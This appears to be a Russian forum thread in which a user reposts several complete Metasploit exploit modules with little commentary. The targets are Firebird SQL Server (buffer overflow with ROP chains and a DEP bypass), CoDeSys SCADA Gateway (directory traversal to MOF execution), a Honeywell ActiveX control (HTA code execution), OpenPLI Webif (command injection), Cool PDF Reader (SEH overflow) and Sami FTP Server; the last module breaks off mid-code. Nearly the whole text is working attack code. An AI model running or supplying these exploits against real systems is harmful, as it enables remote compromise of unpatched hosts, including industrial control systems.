Модули для Metasploit Framework

[DarckSol]

Firebird Relational Database CNCT Group Number Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
 
  def initialize
    super(
      'Name'           => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in Firebird SQL Server.  A specially
        crafted packet can be sent which will overwrite a pointer allowing the attacker to
        control where data is read from.  Shortly, following the controlled read, the
        pointer is called resulting in code execution.
 
        The vulnerability exists with a group number extracted from the CNCT information,
        which is sent by the client, and whose size is not properly checked.
 
        This module uses an existing call to memcpy, just prior to the vulnerable code,
        which allows a small amount of data to be written to the stack. A two-phases
        stackpivot allows to execute the ROP chain which ultimately is used to execute
        VirtualAlloc and bypass DEP.
      },
      'Author'      => 'Spencer McIntyre',
      'Arch'        => ARCH_X86,
      'Platform'    => 'win',
      'References'  =>
        [
          [ 'CVE', '2013-2492' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh'
        },
      'Payload'      =>
        {
          # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
          'Prepend'  => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
          'Space'    => 400,
          'BadChars' => "\x00\x0a\x0d"
        },
      'Targets'     =>
        [
          # pivots are pointers to stack pivots
          [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
          [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
          [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
          [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 31 2013'
    )
 
    register_options([Opt::RPORT(3050)], self.class)
  end
 
  def check
    begin
      connect
    rescue
      return Exploit::CheckCode::Safe
    end
 
    filename =  "C:\\#{rand_text_alpha(12)}.fdb"
    username = rand_text_alpha(7)
 
    check_data =  ""
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
    check_data << "\x00\x00\x00\x13"
    check_data << filename
    check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"
    check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"
    check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
    check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
    check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
    check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
    check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
    check_data << "\x00\x00\x00\x08"
 
    sock.put(check_data)
    data = sock.recv(16)
    disconnect
 
    opcode = data.unpack("N*")[0]
    version = data.unpack("N*")[1]
    if opcode == 3 # Accept
      if [ 0xffff800b, 0xffff800c ].include?(version)
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Unknown
  end
 
  def stack_pivot_rop_chain
    case target.name
    when 'Windows FB 2.5.2.26539'
      rop_chain = [
        0x005e1ea4,    # MOV EAX,EDI # RETN [fbserver.exe]
        0x0059ffeb,    # POP EBP # RETN [fbserver.exe]
        0x0000153c,    # 0x0000153c-> ebp
        0x005d261f,    # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
        0x0059fe1f,    # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.5.1.26351'
      rop_chain = [
        0x005e1ab8,    # MOV EAX,EDI # RETN [fbserver.exe]
        0x0059650b,    # POP EBP # RETN [fbserver.exe]
        0x0000153c,    # 0x0000153c-> ebp
        0x005cf6ff,    # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
        0x0059a3db,    # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.5.18496'
      rop_chain = [
        0x0055b844,    # MOV EAX,EDI # RETN [fbserver.exe]
        0x4a86ee77,    # POP ECX # RETN [icuuc30.dll]
        0x000001c0,    # 0x000001c0-> ebp
        0x005aee63,    # ADD EAX,ECX # RETN [fbserver.exe]
        0x4a82d326,    # XCHG EAX,ESP # RETN [icuuc30.dll]
      ].pack("V*")
    when 'Debug'
      rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
    end
    return rop_chain
  end
 
  def final_rop_chain
    # all rop chains in here created with mona.py, thanks corelan!
    case target.name
    when 'Windows FB 2.5.2.26539'
      rop_chain = [
        0x4a831344,  # POP ECX # RETN [icuuc30.dll]
        0x0065f16c,  # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x005989f0,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x004666a6,  # XCHG EAX,ESI # RETN [fbserver.exe]
        0x00431905,  # POP EBP # RETN [fbserver.exe]
        0x00401932,  # & push esp # ret  [fbserver.exe]
        0x4a844ac0,  # POP EBX # RETN [icuuc30.dll]
        0x00001000,  # 0x00001000-> ebx
        0x4a85bfee,  # POP EDX # RETN [icuuc30.dll]
        0x00001000,  # 0x00001000-> edx
        0x005dae9e,  # POP ECX # RETN [fbserver.exe]
        0x00000040,  # 0x00000040-> ecx
        0x0057a822,  # POP EDI # RETN [fbserver.exe]
        0x005b0384,  # RETN (ROP NOP) [fbserver.exe]
        0x0046f8c3,  # POP EAX # RETN [fbserver.exe]
        0x90909090,  # nop
        0x00586002,  # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.5.1.26351'
      rop_chain = [
        0x00656472,  # POP ECX # RETN [fbserver.exe]
        0x0065b16c,  # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x00410940,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x0063be76,  # XCHG EAX,ESI # RETN [fbserver.exe]
        0x0041d1ae,  # POP EBP # RETN [fbserver.exe]
        0x0040917f,  # & call esp [fbserver.exe]
        0x4a8589c0,  # POP EBX # RETN [icuuc30.dll]
        0x00001000,  # 0x00001000-> ebx
        0x4a864cc3,  # POP EDX # RETN [icuuc30.dll]
        0x00001000,  # 0x00001000-> edx
        0x0064ef59,  # POP ECX # RETN [fbserver.exe]
        0x00000040,  # 0x00000040-> ecx
        0x005979fa,  # POP EDI # RETN [fbserver.exe]
        0x00424a50,  # RETN (ROP NOP) [fbserver.exe]
        0x4a86052d,  # POP EAX # RETN [icuuc30.dll]
        0x90909090,  # nop
        0x005835f2,  # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.5.18496'
      rop_chain = [
        0x005763d5,  # POP EAX # RETN [fbserver.exe]
        0x005ce120,  # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x004865a4,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
        0x004cf4f6,  # XCHG EAX,ESI # RETN [fbserver.exe]
        0x004e695a,  # POP EBP # RETN [fbserver.exe]
        0x004d9e6d,  # & jmp esp [fbserver.exe]
        0x4a828650,  # POP EBX # RETN [icuuc30.dll]
        0x00001000,  # 0x00001000-> ebx
        0x4a85bfee,  # POP EDX # RETN [icuuc30.dll]
        0x00001000,  # 0x00001000-> edx
        0x00590328,  # POP ECX # RETN [fbserver.exe]
        0x00000040,  # 0x00000040-> ecx
        0x4a8573a1,  # POP EDI # RETN [icuuc30.dll]
        0x0042ba8c,  # RETN (ROP NOP) [fbserver.exe]
        0x00577605,  # POP EAX # RETN [fbserver.exe]
        0x90909090,  # nop
        0x004530ce,  # PUSHAD # RETN [fbserver.exe]
      ].flatten.pack("V*")
    when 'Debug'
      rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
    end
    return rop_chain
  end
 
  def exploit
    connect
 
    rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")
 
    # this data gets written to the stack via memcpy, no more than 32 bytes can be written
    overwrite_and_rop_chain =  [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot
    overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]
    overwrite_and_rop_chain << stack_pivot_rop_chain
 
    filename  =  "C:\\#{rand_text_alpha(13)}.fdb"
    evil_data =  "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
    evil_data << "\x00\x00\x00\x14"
    evil_data << filename
    evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"
    evil_data << "\x05\x20"
    evil_data << overwrite_and_rop_chain
    evil_data << "\x15\x6c\x6f\x63\x61\x6c"
    evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
    evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
    evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
    evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
    evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
    evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
    evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"
    evil_data << rop_nop_sled
    evil_data << final_rop_chain
    evil_data << payload.encoded
 
    print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")
    sock.put(evil_data)
 
    disconnect
  end
 
end

Добавлено в [time]1362984008[/time]
SCADA 3S CoDeSys Gateway Server Directory Traversal Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::WbemExec
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SCADA 3S CoDeSys Gateway Server Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability that allows arbitrary
        file creation, which can be used to execute a mof file in order to gain remote
        execution within the SCADA system.
      },
      'Author'         =>
        [
          'Enrique Sanchez <esanchez[at]accuvant.com>'
        ],
      'License'        => 'MSF_LICENSE',
      'References'     =>
        [
          ['CVE', '2012-4705'],
          ['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf']
        ],
      'DisclosureDate' => 'Feb 02 2013',
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }]
        ],
      'DefaultTarget' => 0))
 
    register_options(
      [
        Opt::RPORT(1211),
      ], self.class)
  end
 
  ##
  # upload_file(remote_filepath, remote_filename, local_filedata)
  #
  # remote_filepath: Remote filepath where the file will be uploaded
  # remote_filename: Remote name of the file to be executed ie. boot.ini
  # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit()
  def upload_file(remote_filepath, remote_filename, local_filedata = null)
    magic_code = "\xdd\xdd"
    opcode = [6].pack('L')
 
    # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\<file with extension mof!
    file = "..\\..\\" << remote_filepath << remote_filename << "\x00"
    #print_debug("File to upload: #{file}")
    pkt_size = local_filedata.size() + file.size() + (0x108 - file.size()) + 4
    #print_debug(pkt_size)
 
    # Magic_code  + packing + size
    pkt = magic_code << "AAAAAAAAAAAA" << [pkt_size].pack('L')
 
    tmp_pkt = opcode << file
    tmp_pkt += "\x00"*(0x108 - tmp_pkt.size) << [local_filedata.size].pack('L') << local_filedata
    pkt << tmp_pkt
 
    print_status("Starting upload of file #{remote_filename}")
    connect
    sock.put(pkt)
    disconnect
 
    print_status("File uploaded")
  end
 
  def exploit
    print_status("Attempting to communicate with SCADA system #{rhost} on port #{rport}")
 
    # We create an exe payload, we have to get remote execution in 2 steps
    exe = generate_payload_exe
    exe_name = Rex::Text::rand_text_alpha(8) + ".exe"
    upload_file("windows\\system32\\", exe_name, exe)
 
    # We create the mof file and upload (second step)
    mof_name = Rex::Text::rand_text_alpha(8) + ".mof"
    mof = generate_mof(mof_name, exe_name)
    upload_file("WINDOWS\\system32\\wbem\\mof\\", mof_name, mof)
 
    print_status("Everything is ready, waiting for a session ... ")
    handler
 
    #Taken from the spooler exploit writen byt jduck and HDMoore
    cnt = 1
    while session_created? == false and cnt < 25
      ::IO.select(nil, nil, nil, 0.25)
      cnt += 1
    end
  end
end

 

[DarckSol]

Honeywell HSC Remote Deployer ActiveX Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
      'Description'    => %q{
          This modules exploits a vulnerability found in the Honewell HSC Remote Deployer
        ActiveX. This control can be abused by using the LaunchInstaller() function to
        execute an arbitrary HTA from a remote location. This module has been tested
        successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI
        R410.1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'juan vazquez'
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0108' ],
          [ 'OSVDB', '90583' ],
          [ 'BID', '58134' ],
          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ],
          [ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f -k'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 22 2013",
      'DefaultTarget'  => 0))
  end
 
  def exploit
    @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
    @dropped_files = [
      @var_exename
    ]
    super
  end
 
  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
    end
 
    @dropped_files.delete_if do |file|
      win_file = file.gsub("/", "\\\\")
      if session.type == "meterpreter"
        begin
          wintemp = session.fs.file.expand_path("%TEMP%")
          win_file = "#{wintemp}\\#{win_file}"
          session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
          session.fs.file.rm(win_file)
          print_good("Deleted #{file}")
          true
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error("Failed to delete #{win_file}")
          false
        end
 
      end
    end
  end
 
  def build_hta(cli)
    var_shellobj    = rand_text_alpha(rand(5)+5);
    var_fsobj    = rand_text_alpha(rand(5)+5);
    var_fsobj_file    = rand_text_alpha(rand(5)+5);
    var_vbsname    = rand_text_alpha(rand(5)+5);
    var_writedir    = rand_text_alpha(rand(5)+5);
 
    var_origLoc    = rand_text_alpha(rand(5)+5);
    var_byteArray    = rand_text_alpha(rand(5)+5);
    var_writestream    = rand_text_alpha(rand(5)+5);
    var_strmConv    = rand_text_alpha(rand(5)+5);
 
    p = regenerate_payload(cli);
    exe = generate_payload_exe({ :code => p.encoded })
 
    # Doing in this way to bypass the ADODB.Stream restrictions on JS,
    # even when executing it as an "HTA" application
    # The encoding code has been stolen from ie_unsafe_scripting.rb
    print_status("Encoding payload into vbs/javascript/hta...");
 
    # Build the content that will end up in the .vbs file
    vbs_content  = Rex::Text.to_hex(%Q|
Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
    # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
    # for conversion with ADODB.Stream
    vbs_ary = []
    # The output of this loop needs to be as small as possible since it
    # gets repeated for every byte of the executable, ballooning it by a
    # factor of about 80k (the current size of the exe template).  In its
    # current form, it's down to about 4MB on the wire
    exe.each_byte do |b|
      vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
    end
    vbs_content << vbs_ary.join("")
 
    # Continue with the rest of the vbs file;
    # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
    # Then use ADODB.Stream again to write the binary to file.
    #print_status("Finishing vbs...");
    vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
                    #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"
 
Set #{var_strmConv} = CreateObject("ADODB.Stream")
 
#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2
 
SetLocale(#{var_origLoc})|)
 
    hta = <<-EOS
      <script>
      var #{var_shellobj} = new ActiveXObject("WScript.Shell");
      var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
      var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
      var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
 
      #{var_fsobj_file}.Write(unescape("#{vbs_content}"));
      #{var_fsobj_file}.Close();
 
      #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
      #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
      #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
      window.close();
      </script>
    EOS
 
    return hta
  end
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
 
    if agent !~ /MSIE \d/
      print_error("Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end
 
    uri  = ((datastore['SSL']) ? "https://" : "http://")
    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
    uri << ":#{datastore['SRVPORT']}"
 
    print_status("Request received for #{request.uri}");
 
    if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/
      hta = build_hta(cli)
      print_status("Sending HTA application")
      send_response(cli, hta, {'Content-Type'=>'application/hta'})
      return
    end
 
    html = <<-EOS
    <html>
    <body>
    <object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">
    </object>
    <script>
      RemoteInstaller.LaunchInstaller("#{uri}", "", false);
    </script>
    </body>
    </html>
    EOS
 
    # we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests
    proc = Proc.new do |cli, req|
      on_request_uri(cli, req)
    end
 
    add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil
 
    print_status("Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})
 
  end
 
end

 

[DarckSol]

OpenPLI Webif Arbitrary Command Execution

Some Dream Boxes with OpenPLI version 3 beta images are vulnerable to OS command injection in the Webif 6.0.4 web interface. This is a blind injection, which means that you will not see any output of your command. A ping command can be used for testing the vulnerability. This Metasploit module has been tested in a box with the next features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware 1.06 and Web Interface 6.0.4-Expert (PLi edition).

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'OpenPLI Webif Arbitrary Command Execution',
      'Description'   => %q{
          Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command
        injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means
        that you will not see any output of your command. A ping command can be used for
        testing the vulnerability.  This module has been tested in a box with the next
        features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1
        Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware
        1.06 and Web Interface 6.0.4-Expert (PLi edition).
      },
      'Author'        => [ 'm-1-k-3' ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          [ 'OSVDB', '90230' ],
          [ 'BID', '57943' ],
          [ 'EDB', '24498' ],
          [ 'URL', 'http://openpli.org/wiki/Webif' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ]
        ],
      'Platform'     => ['unix', 'linux'],
      'Arch'         => ARCH_CMD,
      'Privileged'   => true,
      'Payload'      =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat generic'
            }
        },
      'Targets'      =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Feb 08 2013'
    ))
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending remote command...")
    vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
    begin
      send_request_cgi(
        {
          'uri'    => normalize_uri("cgi-bin", "setConfigSettings"),
          'method' => 'GET',
          'vars_get' => {
            "maxmtu" => "1500&#{payload.encoded}&"
          }
        })

    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
    end
  end
end

 

[DarckSol]

Cool PDF Image Stream Buffer Overflow Vulnerability

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF
  include Msf::Exploit::Remote::Seh
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cool PDF Image Stream Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Cool PDF Reader prior to version
        3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that
        contains a specially crafted image stream. This module has been tested successfully
        on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Francis Provencher', # Vulnerability discovery
          'Chris Gabriel', # Proof of concept
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4914' ],
          [ 'OSVDB', '89349' ],
          [ 'EDB', '24463' ],
          [ 'URL', 'http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70' ]
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3',
            {
              'Offset' => 433,
              'Ret' => 0x00539fa4 # ppr from coolpdf.exe
            }
          ]
        ],
      'DisclosureDate' => 'Jan 18 2013',
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The output filename.', 'msf.pdf'])
      ], self.class)
  end
 
  def exploit
    file_create(make_pdf)
  end
 
  def jpeg
    p = payload.encoded
    sploit =  "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64" + "\x6F\x62\x65\x00\x64\x80\x00\x00"
    sploit << "\x00\x02\xFF\xDB\x00\x84\x00\x02" + "\x02\x02\x02\x02\x02\x02\x02\x02"
    sploit << "\x02\x03\x02\x02\x02\x03\x04\x03" + "\x03\x03\x03\x04\x05\x04\x04\x04"
    sploit << "\x04\x04\x05\x05\x05\x05\x05\x05" + "\x05\x05\x05\x05\x07\x08\x08\x08"
    sploit << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09" + "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
    sploit << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01" + "\x03\x02\x02\x03\x03\x03\x07\x05"
    sploit << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F" + "\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
    sploit << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C" + "\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
    sploit << "\x0E\x0E\x0C\x11\x11\x11\x11\x11" + "\x11\x11\x11\x11\x11\x11\x11\x11"
    sploit << "\x11\x11\x11\x11\x11\x11\x11\x11" + "\xFF\xC0\x00\x14\x08\x00\x32\x00"
    sploit << "\xE6\x04\x01\x11\x00\x02\x11\x01" + "\x03\x11\x01\x04\x11\x00\xFF\xC4"
    sploit << "\x01\xA2\x00\x00\x00\x07\x01\x01" + "\x01\x01\x01\x00\x00\x00\x00\x00"
    sploit << "\x00\x00\x00\x04\x05\x03\x02\x06" + "\x01\x00\x07\x08\x09\x0A\x0B\x01"
    sploit << "\x54\x02\x02\x03\x01\x01\x01\x01" + "\x01\x00\x00\x00\x00\x00\x00\x00"
    sploit << "\x01\x00\x02\x03\x04\x05\x06\x07"
    sploit << rand_text(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << p
    sploit << rand_text(2388 - p.length)
    return sploit
  end
 
  # Override the mixin obfuscator since it doesn't seem to work here.
  def nObfu(str)
    return str
  end
 
  def make_pdf
    @pdf << header
    add_object(1, nObfu("<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>"))
    add_object(2, nObfu("<</Type/Outlines>>"))
    add_object(3, nObfu("<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>"))
    add_object(4, nObfu("[/PDF/Text/ImageC]"))
    add_object(5, nObfu("<</Type/Page/Parent 3 0 R/Contents 6 0 R>>"))
    stream_1 = "stream" << eol
    stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
    stream_1 << "endstream" << eol
    add_object(6, nObfu("<</Length 91>>#{stream_1}"))
    stream = "<<" << eol
    stream << "/Width 230" << eol
    stream << "/BitsPerComponent 8" << eol
    stream << "/Name /X" << eol
    stream << "/Height 50" << eol
    stream << "/Intent /RelativeColorimetric" << eol
    stream << "/Subtype /Image" << eol
    stream << "/Filter /DCTDecode" << eol
    stream << "/Length #{jpeg.length}" << eol
    stream << "/ColorSpace /DeviceCMYK" << eol
    stream << "/Type /XObject" << eol
    stream << ">>"
    stream << "stream" << eol
    stream << jpeg << eol
    stream << "endstream" << eol
    add_object(7, stream)
    finish_pdf
  end
 
end

Добавлено в [time]1363848778[/time]
Sami FTP Server LIST Command Buffer Overflow Vulnerability

require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = LowRanking
 
  include Msf::Exploit::Remote::Ftp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'       => 'Sami FTP Server LIST Command Buffer Overflow',
      'Description'   => %q{
          This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
        The vulnerability exists in the processing of LIST commands. In order to trigger
        the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing
        application, in the target machine. On the other hand, the source IP address used
        to connect with the FTP Server is needed. If the user can't provide it, the module
        will try to resolve it. This module has been tested successfully on Sami FTP Server
        2.0.1 over Windows XP SP3.
      },
      'Platform'     => 'win',
      'Author'     =>
        [
          'superkojiman', # Original exploit
          'Doug Prostko <dougtko[at]gmail.com>' # MSF module
        ],
      'License'     => MSF_LICENSE,
      'References'   =>
        [
          [ 'OSVDB', '90815'],
          [ 'BID', '58247'],
          [ 'EDB', '24557']
        ],
      'Privileged'   => false,
      'Payload'     =>
        {
          'Space'          => 1500,
          'DisableNops'    => true,
          'BadChars'       => "\x00\x0a\x0d\x20\x5c",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Targets'     =>
        [
          [ 'Sami FTP Server 2.0.1 / Windows XP SP3',
            {
              'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
              'Offset'   => 228
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Feb 27 2013'))
    register_options(
      [
        OptAddress.new('SOURCEIP', [false, 'The local client address'])
      ], self.class)
  end
 
  def exploit
    connect
